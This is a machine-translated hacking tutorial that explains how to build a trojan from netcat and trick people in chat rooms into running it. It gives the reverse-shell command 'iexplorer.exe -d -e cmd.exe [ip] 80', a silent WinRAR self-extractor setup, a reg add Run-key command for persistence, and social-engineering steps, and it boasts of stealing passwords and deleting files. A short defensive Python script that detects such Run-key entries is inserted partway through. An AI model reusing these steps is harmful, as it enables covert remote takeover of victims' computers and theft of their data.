Trojanized NetCAT by WHK
As you know, netcat can serve a shell directly or make a reverse connection to a DNS name or IP address that I specify (for those who do not know, DNS is a kind of translation that makes it easier to find your PC: for example, the IP would be 200.32.22.25 and the DNS name pagina.cl).
Well ... first you have to know what we will do ... the main idea is to take a shell of the PC of anyone of an IRC (Chat).
Materials:
ResHacker
Netcat v1.1
Winrar (graphic mode)
Internet Explorer icon
Well, if you do not know where to find the icon will try to give it to this document XD if you can can use any icon (you can but also do no icons will be suspect.)
The first is to connect to a chat XD and achieved a victim (hopefully not do it with their girlfriends because if they get caught they're going to kick XD) ... Once you say .. "That's my victimaaaaa!" So we'll use something called social engineering and through the mill himself impersonating someone or made the friendship of that person in order to get what we want, the idea is to talk with and bla bla bla bla bla bla where you finish ... when you say that the next day we talked ... ps if all goes well tomorrow and have enough confidence to give a program that will help in maintaining your PC or just have fun with a game XD. We leave
chat and at night we start to make the Trojan in the following way:
Step 1: First we change the icon to make it less suspect to the ResHacker:
First open the ResHacker and give in "File / Open" and look for the netcat. After you click on action and then "Add a new Resource", then see the window you see to the right and click where it says "Open file with new resource" (step 3) to find the icon that we had, then where it says " Resource Name "Please enter the word" ICON "as seen in Photo and finally pressed the "Add Resource" and "File / Save." With all this you will create a backup of the original netcat you can delete it peacefully and to refresh the screen (F5) that netcat really has the same icon in Internet Explorer XD
Step 2: rename nc.exe and from now be called "iexplorer.exe" XD, then you click the netcat with the right button of your mouse and should look something like this (obviously after you have installed winrar.)
Winrar will then appear and begin to create our Trojan:
1.
For "Name File "we wrote" carnada.exe "(for now), the format should be in" RAR "the best compression method and finally and most importantly" Create SFX archive ", the rest should be unchecked.
2.
In the "Advanced" tab (above) you must click the button called "SFX Options" and begin to shape our Winrar SFX.
3.
Now "Extraction Folder" tell it to unzip the netcat (iexplorer named) in the directory =% HOMEDRIVE%% HOMEPATH% \\ update, I now will say: "What is this?!" ...% HOMEDRIVE% means that you unzip into the same drive that is Windows, which is usually (not always) "C: \\" ...% HOMEPATH% means "Documents and settings \\ your current user "in conclusion is decompressed within the user's root directory where it is almost the only place where a user without administrator rights can be overwritten, in other words if you had written% windir% \\ system32 may have been flawed to decompress and not everyone is entitled to that directory. Choose a folder called update to attract less attention.
In "Run after extraction" we write this = iexplorer.exe-d-e cmd.exe [here goes our ip] 80, I added the address 127.0.0.1 to test but you will get the real ip that comes to the Internet. 80 is the port where the Trojan will connect with us.
In "Run before extraction" we wrote the following =% windir% \\ system32 \\ cmd / c reg add HKLM \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v "iexplorer" / t REG_SZ / d "% homedrive %% HOMEPATH% \\ update \\ iexplorer.exe-d-e cmd.exe 127.0.0.1 80 "/ f> nul ... and you tell me what's that !!!!... we say that you run the CMD console and call an executable called "REG.EXE" which will add our entry into the system registry to start the Trojan alone every time you turn on the pc (remember that the phrase should put the ip 127.0.0.1 of you or in some cases (for those who know) your DNS is more effective .... ( Ask for the no-ip) and where it says> nul mean that the victim will not see more than a brief flash of a DOS window instead of displaying everything is running.
4.
Here we are asking winrar not display anything while installing this, so it will be quieter, faster and automated.
5.
I put yahoo icon because I'm going to try from the same chat.
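Seen from the defender's side, the autostart entry this procedure leaves behind combines three weak signals: a file name one letter off the genuine Internet Explorer binary (iexplore.exe), an image stored under the user's profile, and netcat-style "-e cmd.exe" arguments. The following audit of `reg query` output is an added example, not part of the original post; the sample listing, user names, the 192.0.2.10 address, the heuristic names and the threshold are all assumptions made for illustration.

```python
import re
from difflib import get_close_matches

# Constructed sample of `reg query` output for the machine-wide Run key.
# User names and the 192.0.2.10 address (documentation range) are made up.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    iexplorer    REG_SZ    C:\Documents and Settings\alice\update\iexplorer.exe -d -e cmd.exe 192.0.2.10 80
    Chat    REG_SZ    C:\Users\bob\AppData\Local\Vendor\chat.exe --minimized
    Updater    REG_SZ    "C:\Program Files\Vendor\updater.exe" /background
"""

KNOWN = ["iexplore.exe", "explorer.exe", "svchost.exe", "lsass.exe"]  # genuine Windows names
ENTRY = re.compile(r"^\s{4}(.+?)\s{4}(REG_\w+)\s{4}(.*)$")  # name, type, data columns
IMAGE = re.compile(r'"?(.+?\.exe)"?(?:\s|$)', re.I)  # executable path, quoted or not
USER_PATH = re.compile(
    r"%homepath%|%userprofile%|%appdata%|\\documents and settings\\|\\users\\", re.I)
SHELL_ARGS = re.compile(r"\s-e\s+\S*cmd(\.exe)?\b", re.I)  # netcat-style "-e cmd.exe"

def reasons_for(data):
    """Return the list of heuristics a Run-key command line trips."""
    hits = []
    m = IMAGE.match(data)
    name = m.group(1).rsplit("\\", 1)[-1].lower() if m else ""
    # Near-miss of a system binary name, but not the real name itself.
    if name and name not in KNOWN and get_close_matches(name, KNOWN, n=1, cutoff=0.9):
        hits.append("lookalike-name")
    if USER_PATH.search(data):
        hits.append("user-writable-path")
    if SHELL_ARGS.search(data):
        hits.append("shell-redirect-args")
    return hits

def audit_run_key(text, threshold=2):
    """Parse `reg query` output; report entries tripping >= threshold heuristics."""
    findings = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if not m:
            continue
        hits = reasons_for(m.group(3))
        if len(hits) >= threshold:
            findings.append((m.group(1), hits))
    return findings

if __name__ == "__main__":
    for value, hits in audit_run_key(SAMPLE):
        print(f"{value}: {', '.join(hits)}")
```

A single heuristic, such as a per-user application starting from the profile directory, stays below the threshold; only the entry that trips several at once is reported.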
Now let's create the program that will connect us with the victim, and is called "Customer"
Just run it and be ready to receive the connection of who opens the bait:
And ready now just need visit our friend the day before and say you have a really cool game and you have something to not ... use your imagination. In my case, I entered a room like yahoo and now this highly fashionable XD booters put in a room to come down to antibooter could not leave the room and pass on a link to the address where he was staying the Trojan. In a nutshell ... if someone falls in your wickedness you should see this:
You've taken the shell of another PC (run a shell from another pc means to control the Windows or DOS shell in GNU .. is able to control the command of the other person and through that you can raise your files , erase things, to give Trojans that allow you to view your desktop ... turning to look at their record passwords in text and making a "type" ... for those who know a little bit more .. maybe jump to other pc with netbios, exploits like dcom, access servers, where an entire network and ufff .. to the imagination. If you do not believe me look at these three sacks playing with netcat XD nothing serious:
1. The dream of every lick XD:
2. RealVnc4 rising to make a reverse connection and watch the other person's desktop (tutorial below):
3. This was a settling of accounts XD:
NOTE: Files deleted from the shell do not go to the Recycle Bin; they are eliminated entirely.
I showed how to create a Trojan with netcat (undetectable by all antivirus for now) also can be done with a direct connection instead of an inverse as I did here, and you know it
This is all and I hope to show you the next time .. Netcat v1.1 how to convert an SMTP client to send automated and timed post while serving as automated FTP client commands without the need for intervention by typing commands at the console, as well as put a password to a shell with netcat session among many other things
Salu2 Att. Yan. Unilola